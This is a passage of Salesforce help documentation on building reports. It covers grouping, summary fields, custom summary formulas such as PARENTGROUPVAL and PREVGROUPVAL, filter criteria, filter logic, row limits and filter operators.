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3. Choose the report format.
4. Follow the steps of the wizard using the Next button. For each report, customize the following:

• Specify Row and Column Headers: On the Select Grouping page for summary and matrix reports, choose the fields
by which you want to group and subtotal the data. In a summary report, choosing more than one sort field allows you
to subsort your data. For matrix reports, select summary fields for the row labels and column headings. When grouping
by a date field, you can further group the data by a specific time period such as days, weeks, or months.

Note:  On the Select Grouping page, if you set Group Dates By to "Calendar Month in Year" or "Calendar
Day in Month," you won't be able to drill down to those date groupings in reports or dashboards. Users are
taken to the unfiltered report instead.

• Summarize Data: On the Select Columns to Total page, choose the types of summary information to display for
numeric fields.

• Build Custom Summary Formulas: On the Select Columns to Total page for summary and matrix reports, create
custom summary formulas to calculate additional totals based on existing report summaries. A formula is an algorithm
that derives its value from other fields, expressions, or values. See Build a Custom Summary Formula on page 2608.

• Choose Fields: On the Select Columns page, choose the fields to display in the report. You can display only those
fields that are visible in your page layout and field-level security settings. If you choose the Description field or any
other long text field, only the first 255 characters are displayed.

• Only the first 254 characters in a rich text area or a long text area are displayed in a report.
• Order Columns: On the Order Columns page, select the order for displaying the chosen fields.
• Limit Report Results: On the Select Criteria page, choose the appropriate settings from the drop-down lists, then use

the filter options to limit the report to records with specific data.

The report wizard supports up to 10 filters. On reports with more than 10, additional filters are dropped and the report
shows an error for any filter logic.

Tip: To use a tabular report on a dashboard, first limit the row count, by setting the Rows to Display
option, the sort column, and the order on the Select Criteria page of the report. You can't use gauge or metric
components on dashboards using tabular reports.

• Chart Settings: On the Select the Chart Type and Report Highlights step of the report wizard, set chart properties
to display your report data in a chart. Charts are available only for summary and matrix reports.

5. Click Run Report to view the report, or click Export Details to save the report as an Excel file or other format.

Tip:  Customizing your reports can require running them a few times as you adjust the report criteria and options.
We recommend using a filter that gives you a smaller sampling of data until you are finished customizing the report
and ready to save.

See Also:
Build a New Report
Creating a Custom Report
Group Your Report Data
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Group Your Report Data

Group data in columns or rows in summary, matrix, and joined reports to display meaningful information. For example, group
opportunities by Close Date to see closed opportunities or group cases by product to see the number of cases for each product.
You can have groupings inside groupings.

Available in: All editions except Database.com

Joined reports are available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Data for Grouping

The Fields pane displays fields from the selected report type, organized by folder. Before you group data in a summary report,
drag and drop at least a few fields into the preview pane.

Add a Grouping

Add a group by dropping a field onto a drop zone.

Click Show > Drop Zones to make them visible. You can also click a column menu for a field in the report and choose Group
by this Field.

Tip:  If you group your report by a date field, you can click the group menu, select Group Dates By, and specify the
grouping time frame: day, week, month, quarter, year, etc.

Grouping Data in Different Report Formats

Summary and joined reports can have up to three grouping levels. Matrix reports can have two row and two column groupings.
For matrix reports, you can't use the same field for both row and column groupings. For joined reports, you can use the fields
from the Common Fields category in the Fields pane to group across all report blocks.

Remove a Grouping

To remove a group, click the group menu and choose Remove Group. You can also grab the group and:

• Drag it to the column bar to remove the group, but keep the field as a column in the report.
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• Drag it back to the Fields pane to remove the group and the field from the report.

Change Order of a Grouping

Drag groups to change their order, or click the group menu and choose Move Group Up or Move Group Down for column
groupings, or Move Group Left or Move Group Right for row groupings.

See Also:
Build a New Report
Create a Custom Report in Accessibility Mode
Keep Working While Your Report Preview Loads
Report Fields
Subtotal Report Results

Keep Working While Your Report Preview Loads

For most actions, you can continue working on your report while the preview loads. For example, when editing a report you
can drag multiple fields into the report, then create a grouping while those columns load.

With report builder, for most actions, you can continue working on your report while the preview loads. For example, when
editing a report you can drag multiple fields into the report, then create a grouping while those columns load.

Note:  Asynchronous loading isn't available for matrix and joined reports.

You can continue working in the report preview while the following actions occur:

• Add, remove, or reorder fields

• Add or remove summary fields

• Add, remove, or reorder groupings

• Remove formulas

Note:  If you remove a summary field or formula used in a chart, the chart reloads, but the report preview loads
asynchronously.

You can't work in the report preview while the following actions occur:

• Add or edit formulas

• Remove a report's only grouping

• Remove a column used to limit the row count for a tabular report

• Sort the report by group or column

• Update standard or custom filters

• Change report format

• Show or hide report details

• Add or remove a chart

• Add or remove conditional highlighting

• Change Group Dates By
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• Change a converted currency field

• Save the report

See Also:
Build a New Report
Group Your Report Data
The Report Builder Screen
Build a New Report
Report Fields

The Report Builder Screen

Report builder is a visual editor for reports. The report builder screen lets you work with report fields and filters, and shows
you a preview of your report with just some of the data.

Available in: All editions except Database.com

To optimize screen real estate, report builder uses a compressed page header. To view your application tabs, simply close the
builder or click the Salesforce logo.

Fields Pane

The Fields pane displays fields from the selected report type, organized by folder. Find the fields you want using the
Quick Find search box and field type filters, then drag them into the Preview pane to add them to the report.

Create, view, edit, and delete custom summary formulas and bucket fields in the Fields pane as well.

In the joined report format, the Fields pane displays fields from all report types added to the report, organized by report
type.

Filters Pane

Set the view, time frame, and custom filters to limit the data shown in the report.

Preview Pane

The dynamic preview makes it easy for you to customize your report. Add, reorder, and remove columns, summary fields,
formulas, groupings, and blocks. Change the report format and display options, or add a chart.

The preview shows only a limited number of records. Run the report to see all your results.

See Also:
Build a New Report
Keep Working While Your Report Preview Loads
Report Fields
Share Insights with Dashboards
Create a Report
Build a New Report
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Report Fields

The Fields pane displays fields from the selected report type, organized by folder. It also lists custom summary formulas, which
you can create, edit, and delete.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Adding Field Filters

With tabular, summary, and matrix reports, you can drag a field from the Fields pane to the Filters pane to add a report
filter.

Finding Fields

Find a field by typing its name into the Quick Find search box. You can also filter the list by type:
• Click  to see all field types, as well as custom summary formulas.
• Click  to see just text fields.
• Click  to see just number fields (numeric, percentage, or currency).
• Click  to see just date fields.

Adding and Removing Fields

To add a field to a tabular, summary, or matrix report, double-click it or drag it into the Preview pane. To add a field
to a joined report, drag it to the Preview pane. Press CTRL to select multiple fields. Drag an entire folder to add all its
fields. If a tabular, summary, or matrix report already contains a field, you can't add it again. You can add the same field
multiple times to a joined report as long as you add it to different blocks. In the preview pane, click Show > Details to
see your report fields. While Show > Details is disabled, you can only add summary fields.

To remove a field, grab its column header and drag it back to the Fields pane. With tabular, summary, and matrix reports,
you can click the column menu and choose Remove Column, or click Remove All Columns.

Working with More than One Field

You can select multiple fields to add, remove, or reorder. For example, you can add Created By, Type and Opportunity
Name to your report at the same time.

To select multiple fields or columns, press CTRL (Windows) or Command (Mac).

Note:

• When you add multiple fields, they appear in the report in the order selected.

• For summary and tabular formats, disable Show > Details when adding multiple summarizable fields to a
report. The Summarize dialog automatically appears, letting you select summaries for all the fields at once.

• Enable Show > Details when adding non-summary fields, such as text fields to a report.

2603

Gather Data with ReportsGather Data



• When working with a joined report, you can select multiple fields from the Common Fields category and
one report type. You can’t select multiple fields from different report types.

Ordering and Sorting Fields

Reorder report columns by grabbing a column header and dragging it to a new location. Press CTRL to select multiple
columns. To sort your report by a column, click its column header. You can also click the column menu and choose Sort
Ascending or Sort Descending from the drop-down list. Sort is disabled when Show > Details isn't selected.

Changing the Currency Displayed

If your organization has enabled multiple currencies, you can change the currency shown for all currency fields. Click
Show > Display Currencies Using, then select an active currency to display.

See Also:
Build a New Report
The Report Builder Screen
Summarize Your Report Data
Work with Formulas in Report Builder
Group Your Report Data
Summarize Your Report Data
Highlight Data Ranges

Summarize Your Report Data

A summary field contains numeric values for which you want to know the sum, the average, or the highest or lowest. Summary
fields show at all grouping levels. In summary and matrix reports, they also appear at the grand total level.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

The Fields pane displays fields from the selected report type, organized by folder.

A summary is the Sum, Average, Max, or Min for a number field. (Use the  filter to find them faster.)

To add a summary field:

• Double-click a number field in the Fields pane.

• Drag a number field into the preview. Press CTRL to select multiple fields. For matrix reports, there are drop zones before,
between, and after sets of summaries. For example, the sum, average, max, and min of Annual Revenue are a set, and
you can't drop a new summary field between them.
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• Choose Summarize this Field in the column menu for a field already in the report.

To change an existing summary field, or add other summaries on that same field, click  next to the summary field and
choose Summarize this Field.

To remove a summary field:

• Click its menu and choose Summarize this Field and deselect all options.

• Click its menu and choose Remove Summary.

• Drag the summary set back to the Fields pane. Note that all summaries for that field are removed. Press CTRL to select
multiple summary fields.

Reorder sets of summary fields in matrix reports by dragging them. The summaries for each field move together when dragged.
For example, if your report contains the sum and average of Annual Revenue, and the max and min of Probability,.you
can drag the Probability summaries before or after the Annual Revenue summaries, but not between. Summaries can't
be placed after custom summary formulas or Record Count.

See Also:
Build a New Report
Report Fields
Filter Your Report Data
About Summary Functions
Examples of Summary Functions in Reports
Work with Formulas in Report Builder
Use a Summary Function in a Report Formula
Build a Custom Summary Formula
Get the Most Out of Custom Summary Formulas
Subtotal Report Results
Report Fields
Subtotal Report Results

About Summary Functions

Summary functions let you use grouping values in custom summary formulas for reports. Formulas are available with summary,
matrix, and joined reports.

There are two summary functions: PARENTGROUPVAL and PREVGROUPVAL.

PARENTGROUPVAL

Use this function to calculate values relative to a parent grouping.

This function returns the value of a specified parent grouping. A “parent” grouping is any
level above the one containing the formula. You can only use this function in custom summary
formulas for reports.

Description:

Summary and Joined: PARENTGROUPVAL(summary_field, grouping_level)

Matrix: PARENTGROUPVAL(summary_field, parent_row_grouping,
parent_column_grouping)

Use:
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Where summary_field is the summarized field value, grouping_level is the parent
level for summary reports, and parent_row_level and parent_column_level are the
parent levels for matrix reports.

TOTAL_PRICE:SUM/PARENTGROUPVAL(TOTAL_PRICE:SUM, GRAND_SUMMARY)Example:

This formula calculates, for each product, its relative size compared to the grand total. In
this example, the report is a summary of opportunities and their products, grouped by
Product Name.

PREVGROUPVAL

Use this function to calculate values relative to a peer grouping. If there’s no previous grouping, the function returns a null
value.

This function returns the value of a specified previous grouping. A “previous” grouping is
one that comes before the current grouping in the report. Choose the grouping level and

Description:

increment. The increment is the number of columns or rows before the current summary.
The default is 1; the maximum is 12. You can only use this function in custom summary
formulas for reports.

PREVGROUPVAL(summary_field, grouping_level [, increment])Use:

Where summary_field is the name of the grouped row or column, grouping_level is
the summary level, and increment is the number of rows or columns previous.

AMOUNT:SUM - PREVGROUPVAL(AMOUNT:SUM, CLOSE_DATE)Example:

This formula calculates, for each month, the difference in amount from the previous month
shown in the report. In this example, the report is an opportunity matrix with columns
grouped by Close Date and rows by Stage.

See Also:
Summarize Your Report Data
Build a Custom Summary Formula
Work with Formulas in Report Builder
Build a Custom Summary Formula for a Joined Report
Examples of Summary Functions in Reports
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Examples of Summary Functions in Reports

Three Week Moving Average

To calculate a three-week moving average of opportunity amounts:

(OppProductTrends__c.Amount__c:SUM+ PREVGROUPVAL(OppProductTrends__c.Amount__c:SUM,
OppProductTrends__c.as_of_date__c) + PREVGROUPVAL(OppProductTrends__c.Amount__c:SUM,
OppProductTrends__c.as_of_date__c,2))/3

See Also:
Summarize Your Report Data

Work with Formulas in Report Builder

Formulas let you create custom summaries based on calculated values using report data. These formulas can then be used as
columns in your report.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

The Fields pane displays fields from the selected report type, organized by folder.

To add a new formula to a summary or matrix report, double-click Add Formula. Once you define it and click OK, it's
automatically added to the preview as a column for summary reports, and a summary field for matrix reports. With joined
reports, you can add either a cross-block or a standard custom summary formula. To edit a formula, hover over the name in
the Fields pane and click .

To remove a formula from the preview, grab its header and drag it back to the Fields pane, or click its menu and choose
Remove Formula. Press CTRL to select multiple formulas. Removing a formula from the preview doesn't delete it. To delete

a formula, hover over the name and click , or click Delete Formula from the field menu.

Dashboard and report charts that display values from custom summary formulas display decimal places using your default
currency setting instead of what you specified for the formula. For example, if the summary formula specifies zero decimal
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places, no decimal places appear in columns, but chart values show the number of decimal places specified for your default
currency (usually two decimal places). This applies to currencies, numbers, and percentages.

See Also:
Summarize Your Report Data
Build a Custom Summary Formula
Report Fields

Use a Summary Function in a Report Formula

Summary functions let you use grouping values in custom summary formulas for reports. Formulas are available with summary,
matrix, and joined reports.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Double-click Add Formula in the Fields pane.
2. In the Custom Summary Formula dialog, under Functions, select Summary.
3. Select PARENTGROUPVAL or PREVGROUPVAL.
4. Select the grouping level and click Insert.
5. Define the formula, including where to display the formula.
6. Click OK.

See Also:
Summarize Your Report Data
Work with Formulas in Report Builder
About Summary Functions
Examples of Summary Functions in Reports

Build a Custom Summary Formula

Create custom summary formulas for summary and matrix reports to calculate additional totals based on the numeric fields
available in the report.

Available in: All editions except Database.com
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

A formula is an algorithm that derives its value from other fields, expressions, or values. Custom summary formulas can contain
3900 or fewer characters. Custom summary formulas are available for summary, matrix, and joined reports. They can't be
shared across multiple reports.

1. In report builder, click Add Formula in the Fields pane.
2. Enter a name for your formula as it will appear on the report. The label must be unique. Optionally, enter a description.
3. From the Format drop-down list, select the appropriate data type for your formula based on the output of your calculation.
4. From the Decimal Places drop-down, select the number of decimal places to display for currency, number, or percent

data types. This setting is ignored for currency fields in multicurrency organizations. Instead, the Decimal Places for
your currency setting apply.

If you select None for Decimal Places, the effective values are:

• For currency, displays up to 18 digits, with the default decimal-place precision for the currency
• For percentages, displays up to 18 digits, with no decimal places
• For numbers, displays up to 18 digits, without changing the decimal-place precision

5. Set the Where will this formula be displayed? option. The formula calculation will be displayed in the report
at the level you select. To display the formula calculation at every level, including the Grand Total, select All summary
levels.

6. Build your formula:

a. Select one of the fields listed in the Summary Fields drop-down list. This field’s value is used in your formula.
b. Select the kind of summary type to use in your formula. This option is not available for Record Count

DescriptionSummary Type

The summary value of data in a field or grouping of fields.Sum

The largest value of data in a field or grouping of fields.Largest Value

The smallest value of data in a field or grouping of fields.Smallest Value

The average of data in a field or grouping of fields.Average

c. Click Operators to add operators to your formula.
d. Select the function category (All, Logical, Math, or Summary), choose the function you want to use in your formula,

and click Insert.
e. Repeat these steps as necessary.

7. Click Check Syntax to see if your formula contains errors. Errors are highlighted by the cursor.
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8. Click OK. Your formula isn't saved until you save the report.

See Also:
Summarize Your Report Data
Build a New Report
Work with Formulas in Report Builder
Get the Most Out of Custom Summary Formulas
Build a Custom Summary Formula for a Joined Report

Get the Most Out of Custom Summary Formulas

Custom summary formulas are a powerful reporting technique, but they can be tricky. Here are some tips to keep in mind
when working with them.

Available in: All editions except Database.com

Functions for use with custom summary formulas in reports are available under the function category. Select a function, then
click Help on this function for information.

• A summary formula can't reference another summary formula.
• Regardless of the summary formula data type, your summary formula can contain fields of different data types, including:

number, currency, percent, and checkbox (true/false) fields. For example, a summary formula in an Opportunities with
Partners report can reference opportunity Amount or Stage Duration, as well as account Annual Revenue.

• Dashboard and report charts that display values from custom summary formulas display decimal places using your default
currency setting instead of what you specified for the formula. For example, if the summary formula specifies zero decimal
places, no decimal places appear in columns, but chart values show the number of decimal places specified for your default
currency (usually two decimal places). This applies to currencies, numbers, and percentages.

• When a field is deleted or is unavailable (for example, because of field-level security), all custom summary formulas that
contain the field are removed from the report.

• The summary types Sum, Largest Value, Smallest Value, and Average are not available for use with the Record
Count field.

• The Smallest Value summary type includes blank (null) or zero values in the summary formula calculation if these
values are present in your report data.

• The Largest Value summary type includes the largest blank (non-null) value present in your report data.
• Percents are represented as decimals in summary formulas. 20% is represented as 0.20.
• Operators can be used to give fields in summary formulas a negative value. For example: {!EMPLOYEES:SUM} + -

{!SALES:SUM}.
• For custom summary formulas on matrix reports, Salesforce calculates results for all formulas where the Where will

this formula be displayed? option is not set to All summary levels. The formula determines the value
returned. If null is returned, the cell will be empty.

• Summary fields on tabular, summary, and matrix reports can display up to 21-digits. Summary fields of 21 digits will
display precisely, but more than 21 digits may not be precise. If “#Too Big!” appears in report cells, check your formula
for calculations that could result in more than 18 digits. Avoid multiplying large numbers, raising a large number to a
power, or dividing by a very small number.

• Formulas treat blank (null) report cells as zero values.
• “#Error!” displays on report cells whenever an error occurs while calculating a formula’s value. “#Error!” also displays

when formulas divide by zero. To resolve the error, check your formula and provide an alternative value.
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• Cross-block custom summary formulas are available for joined reports.

See Also:
Summarize Your Report Data
Build a Custom Summary Formula
Custom Summary Formulas with Joined Reports
Build a Custom Summary Formula for a Joined Report

Subtotal Report Results

Subtotaling your reports gives you a tool to analyze trends in the data. In summary, matrix, and joined reports, you can group
sets of information and compare subtotals for each set against the overall total. In summary and joined reports, you can also
subtotal by multiple fields to give you cascading sets of information.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”To subtotal report results:

For example, if you subtotal a summary report by Opportunity Owner, the report groups the accounts by Opportunity Owner,
lists the number of opportunities owned by each user, and shows subtotals by Opportunity Owner for all the columns in the
report. You could further subtotal each user’s opportunities by product.

To subtotal your report results:

1. Click Customize from any report.
2. In the report builder, add a summary field to the report. Summaries show up at grouping levels as well as for individual

rows.

Salesforce uses “smart” totaling when you run reports that include duplicate data in any of the columns chosen for summing
or averaging. “Smart” totaling means that duplicate data is counted only once in any subtotal or total. For example, if an
opportunity has two products and you run the Opportunity Product Report with the total opportunity amount selected as a
column to sum by, the amount appears twice in the details of the report, once for each product on the opportunity. In this
case, “smart” totaling correctly calculates any subtotals, grand totals, and averages, adding that opportunity amount only once.

Note:  For dashboard components, “smart” totaling isn't used. For example, in a dashboard table, the total displayed
is simply the sum of the values listed in the table.

See Also:
Summarize Your Report Data
The Report Run Page
Build a Custom Summary Formula
Build a New Report
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Filter Your Report Data

Focus your report on the data you’re interested in by setting up standard filters, field filters, filter logic, cross filters, and row
limits.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Depending on your organization's setup, you may see additional filters, such as probability, hierarchy, territory, and others.

• Use the Show drop-down to select your own, your team's, or all records.

• Hover over a filter to edit or remove it.

See Also:
Build a New Report
Summarize Your Report Data
Save Your Report
Enter Filter Criteria
Build Effective Filters
Filter on Blank Values
Tips for Filtering by Campaign
Tips for Filtering on Multiple Currencies
Add Filter Logic
Getting the Most Out of Filter Logic
Example: Using Row Limits in Report Filters
Filter Choices
Filter Operators
Filter Choices
Filter Operators
Build Effective Filters
Build Effective Filters
Build a New Report
Create a Cross Filter
Enter Filter Criteria
Enter Filter Criteria
Example: Using Row Limits in Report Filters
Getting the Most Out of Filter Logic
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Enter Filter Criteria

Field filters are available for reports, list views, workflow rules, and other areas of the application. For each filter, set the field,
operator, and value.

Available in: All Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

“Read” on the type of record included in the listTo create custom list views:

“Manage Public List Views”To create, edit, or delete public list views:

1. Choose a field from the first drop-down list.
2. Choose a filter operator.
3. Enter a value in the third field and click OK. For picklist fields, click the lookup icon to select a value.

4. Use the Add menu to choose the type of filter to add. By default, the Add button creates a field filter. When you click 
on the field filter, you can browse available fields, the first field in the list is the default.

With tabular, summary, and matrix reports, you can drag a field from the Fields pane to the Filters pane to add a report
filter.

5. Optionally, click Add > Filter Logic to change the default AND relationship between each filter.

If you have Translation Workbench enabled, you can filter on translated strings by specifying the Filter Language for
filter criteria that use contains, does not contain, or starts with operators.

Tip: To change a report filter, hover over it and click Edit or Remove. Your filters display when you run your report;
click Edit on that page to make additional changes.

See Also:
Filter Your Report Data
Filter Operators
Build Effective Filters
Filter Your Report Data

Build Effective Filters

Filters help you hone in on the information you want to find.

Available in: All Editions
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Add filter logic to change the default AND relationship between each filter.

Warning: If you lose access to a field defined in a filter, Salesforce removes it and displays results based on the
remaining filters.

Filtering on Text Fields

• Separate search terms by commas to filter by more than one value. For example, to search for accounts in California, New
York, or Washington, use State contains CA,NY,WA.

• Filtering isn't case sensitive. For example, searching State contains ID returns all matches for “ID”, but also returns
any instances of “Florida” and “Idaho” because they contain “id” in their names.

• When you filter on standard long text area fields, such as Description or Solution Details, only the first 1000 characters
of the field are searched for matches in reports. Reports can’t be filtered on custom long text area fields. Only the first 255
characters are shown for custom long text area fields in list views.

Filtering on Date Fields

• If entering a date, use the format allowed by your Locale setting. You can also use special date values like TODAY,
NEXT WEEK, NEXT YEAR, LAST <number> DAYS, and so on.

Filtering on Numeric Values

• Place quotation marks around numbers or other data that includes commas. For example Amount equals "10,000"
returns records that have an amount of $10,000 but Amount equals 10,000 returns $10,000 as well as $10 and $0.

• To search for phone numbers, include the exact phone number formatting or example, Phone starts with (561).

Filtering on Picklist Values

• When filtering on multi-select picklist fields, use a semicolon between values to specify an exact match.

For example, selecting the “equals” operator and a semicolon between two values includes records with both values specified,
excluding all other values.

• If your organization uses record types, the lookup dialog lists picklist values for all record types. Use the “equals” or “not
equal to” operators for these filters.

Note: If you change the label for a picklist value that is used as a filter criteria, the picklist value is automatically
removed from the filter criteria. For example, if your report contains a filter where Lead Source equals
Email or Web and you change the picklist value Web to Referral, your report filter will change to Lead
Source equals Email. If the changed picklist value was the only value specified for a particular filter, it will
continue to show up in your filters, but an error will display.

See Also:
Filter Your Report Data
Filter Your Report Data
Enter Filter Criteria
Getting the Most Out of Filter Logic
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Filter on Blank Values

Tips on filtering using blank values.

Available in: All Editions

• When you use the “less than,” "greater than,” “less or equal,” or “greater or equal” operators on fields that have numeric
values, records with blank or “null” values are returned as if their value is zero (0). For example, if you create a workflow
rule or a lead assignment rule for accounts with the criteria Annual Revenue less than 100000, account records
match if their Annual Revenue is blank.

However, records with blank field values are not considered matches in report filters, custom list views, and account
assignment rules (which assign accounts to territories).

• To limit results to records that are blank or contain “null” values for a particular field, choose the field and the “equals” or
“not equal to” operators, leaving the third field blank. For example, Amount equals returns records with blank amount
fields. You can search for blank values or other specified values at the same time. For example, Amount equals 1,,2
returns records where the Amount is blank or contains the value “1” or “2”.

See Also:
Filter Your Report Data
Build Effective Filters
Enter Filter Criteria

Tips for Filtering by Campaign

Tips on filtering by campaign in list views.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

If your organization uses campaigns, you can restrict list views of contacts or leads by campaign to include only those contacts
or leads associated with the campaign.

If you are restricting a list view to a particular campaign:

• You can also filter by campaign member status to include only contacts or leads with a particular status. Select Campaign:
Member Status from the drop-down list in the first column of the filter criteria. In the second column, use the “equals”
or “not equals” operator. Enter one or more status values in the third column. The status values must be valid for your
organization.

• You can choose to display the Campaign: Member Status column in your list view. This option is found at the bottom
of the drop-down list in the Select Fields to Display step of creating a list view.
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• To filter by campaign member status or add a campaign member status display column, first specify a campaign in the
Filter by Campaign area.

See Also:
Filter Your Report Data
Build Effective Filters
Enter Filter Criteria

Tips for Filtering on Multiple Currencies

Tips for filtering on currency fields when your organization uses multiple currencies.

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

If your organization uses multiple currencies, follow these tips to create more effective filters:

• Use the Currency field to find items with a particular currency. For example, Opportunity Currency equals
AUD finds opportunities with amounts in Australian dollars.

• Prefix currency amounts with a currency code, such as Annual Revenue greater than USD 50000000.

Without the currency code, all amounts are assumed to be in the user's currency. For example, if the user's currency is U.S.
dollars, Annual Revenue greater than 50000000 means 50 million U.S. dollars.

If the user's currency is invalid, the corporate currency is used.

From Setup, click Company Profile > Manage Currencies to obtain the currency codes.

• All amounts are converted to the corporate currency for comparison. For example, Annual Revenue greater than
USD 50000000 finds accounts with revenue greater than 50 million U.S. dollars. This would include an account with
revenue of 114 million Australian dollars, which is the equivalent of 60 million U.S. dollars, assuming a conversion rate
of 1.9.

• Amounts in reports are shown in their original currencies, and report totals are displayed in your personal currency. You
can change the currency used for report totals by clicking Show > Currencies. For any amount, you can also choose to
display the “converted” column (for example, “Annual Revenue (converted)”), which will show amounts in the currency
you select from the Display Currencies Using drop-down list.

See Also:
Filter Your Report Data
Build Effective Filters
Enter Filter Criteria

Add Filter Logic

Filter logic lets you specify conditions for your filters using logical operators.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

“Read” on the type of record included in the listTo create custom list views:

“Manage Public List Views”To create, edit, or delete public list views:

To change the default AND relationship between each filter:

1. Click Add > Filter Logic.
2. Enter each filter line number, separated by an operator:

DefinitionOperator

Finds records that match both values.AND

Finds records that match either value.OR

Finds records that exclude values.NOT

See Also:
Filter Your Report Data
Filter Operators
Filter on Blank Values
Filtering on Special Picklist Values
Build Effective Filters
Enter Filter Criteria

Getting the Most Out of Filter Logic

Filter logic lets you apply Boolean conditions to filters to hone in on the data you’re looking for.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

An expression’s syntax can affect filtering results.

DescriptionExample

Finds records that match both the first two filter lines or the third. Use this expression
with the following filter conditions:

(1 AND 2) OR 3

1. Account Owner contains Joe
2. Industry equals Banking

2617

Gather Data with ReportsGather Data



DescriptionExample

3. Annual Revenue greater than 10000000

This filter can help you find banking accounts owned by Joe or any account with a revenue
greater than $10 million.

Tip:  You can enter filter line numbers in any order. For example, 3 OR (1 AND
2) has the same meaning as (1 AND 2) OR 3.

Finds records that match both the first filter line and either of the last two.

Using the same filters in the example above, this report finds all accounts Joe owns that
are either in the banking industry or have a revenue greater than $10 million.

1 AND (2 OR 3)

Tip:  You can repeat a filter line in your expression. For example, 1 AND (2
OR 3) yields the same results as (1 AND 2) OR (1 AND 3).

Note:

• Filter logic isn't available for all filters. For example, you can't use them for roll-up summary fields.

• You can't use filter logic if your field filters use any of the following fields: Description, any Address Line
1, Address Line 2, Address Line 3 fields, Forecast Category, Campaign: Member Type, User:
Profile Name, Login Status, and custom long text area fields. This does not apply to Filter Logic on
lookup filters.

• On reports where object A may or may not have object B, you can't use the OR condition to filter across multiple
objects. For example, if you enter filter criteria Account Name starts with M OR Contact First
Name starts with M, an error message displays informing you that your filter criteria is incorrect.

See Also:
Filter Your Report Data
Add Filter Logic
Build Effective Filters
Filter Your Report Data
Enter Filter Criteria

Example: Using Row Limits in Report Filters

Here is where you can see a sample of a report filter using a field filter, filter logic, and a row limit.

Available in: All editions except Database.com
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Say you are a sales executive who wants to see which California accounts currently have the most potential to generate revenue:

1. Click New Report from the Reports tab.
2. Open the Accounts & Contacts report type, choose Accounts, and click Create.
3. To find California accounts that either have over $10 million in revenue or are public companies, click Add > Field Filter

and create these filters:

a. Billing State/Province equals CA

b. Annual Revenue greater than 10000000

c. Ownership equals Public

4. To ensure that your results include all California accounts with $10 million in revenue OR that are public, click Add >
Filter Logic and enter 1 AND (2 OR 3).

5. To limit the number of results for a tabular report to 10, click Add > Row Limit and enter 10. Choose your sort field and
sort order. Click OK.

When you click Run Report, your results will contain ten rows and include public companies in California with revenues of
more than $10 million.

See Also:
Filter Your Report Data
Filter Choices
Limit Report Results
Getting the Most Out of Filter Logic

Filter Choices

Narrow your report down to the most useful data with field filters, cross filters, and row limits. Use filter logic to control how
your filters work together.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Filter the data in a report using the following filter options:
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DescriptionAdd Filter Option

Field filters are available for reports, list views, workflow rules, and other areas of the
application. For each filter, set the field, operator, and value. With tabular, summary,

Field Filter

and matrix reports, you can drag a field from the Fields pane to the Filters pane to add
a report filter.

Add Boolean conditions to control how field filters are evaluated. You must add at least
one field filter before applying filter logic.

Filter Logic

Filter a report by the child object using WITH or WITHOUT conditions. Add subfilters
to further filter by fields on the child object. For example, if you have a cross filter of

Cross Filter

Accounts with Opportunities, click Add Opportunity Filter and create the
Opportunity Name equals ACME subfilter to only include those opportunities.

For tabular reports, select the maximum number of rows to display, then choose a field
to sort by and the sort order. You can use a tabular report as the source report for a
dashboard table or chart component, if you limit the number of rows it returns.

Row Limit

See Also:
Filter Your Report Data
Filter Your Report Data
Example: Using Multiple Cross Filters
Example: Using WITH in Cross Filters
Example: Using WITHOUT in Cross Filters
Example: Using Row Limits in Report Filters
Getting the Most Out of Filter Logic

Filter Operators

The operator in a filter is like the verb in a sentence. When you choose filter criteria, use an operator to specify the action you
want the filter to take.

You can use the following operators when entering filter criteria on list views, reports, dashboards, and some custom fields:

UsesOperator

Use for an exact match; for example, “Created equals today.”equals

Use for results that are less than the value you enter; for example, “Quota less than 20k”
returns records where the quota field ranges from 0 to 19,999.99.

less than

Use when you want results that exceed the value you enter; for example, “Quota greater
than 20k” returns records where the quota amount begins at 20,000.01.

greater than

Use for results that match or are less than the value you enter.less or equal

Use for results that match or exceed the value you enter.greater or equal
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UsesOperator

Shows results that don’t have the value you enter. This is especially useful for eliminating
empty fields; for example, “Email not equal to <blank>.”

not equal to

Use for fields that include your search string but might also include other information.
For example, “Account contains california” would find California Travel, California Pro

contains

Shop, and Surf California. Keep in mind that if you enter a short search string, it may
match on a longer word. For example, “Account contains pro” would find California Pro
Shop and Promotions Corporation.

Eliminates records that do not contain the value you enter; for example, “Mailing Address
Line 2 does not contain P. O. Box.”

does not contain

Note:  When specifying filter criteria on roll-up summary fields, does not
contain uses “or” logic on comma-separated values. On list views, reports, and
dashboards, does not contain uses “and” logic.

Use when you know what your value starts with, but not the exact text. This is a narrower
search term than “contains.” For example, if you enter “Account starts with california”
you would find California Travel and California Pro Shop, but not Surf California.

starts with

Available when you choose a multi-select picklist as the selected field. Use this operator
to find records that include one or more of the values you enter.

For example, if you enter “Interests includes hockey, football, baseball” you would find
records that only have hockey selected as well as those that have two or three of the values
entered. Results do not include partial matches of values.

includes

Available when you choose a multi-select picklist as the selected field. Use this operator
to find records that do not contain any values that match the ones entered.

For example, if you enter “Interests exclude wine, golf” your report lists records that
contain any other values from that picklist, including those that are blank. Results do not
include partial matches of values.

excludes

Available for dashboard filters only. Use to filter on ranges of values. For each range, the
filter returns results that are greater than or equal to the minimum value and less than
the maximum value.

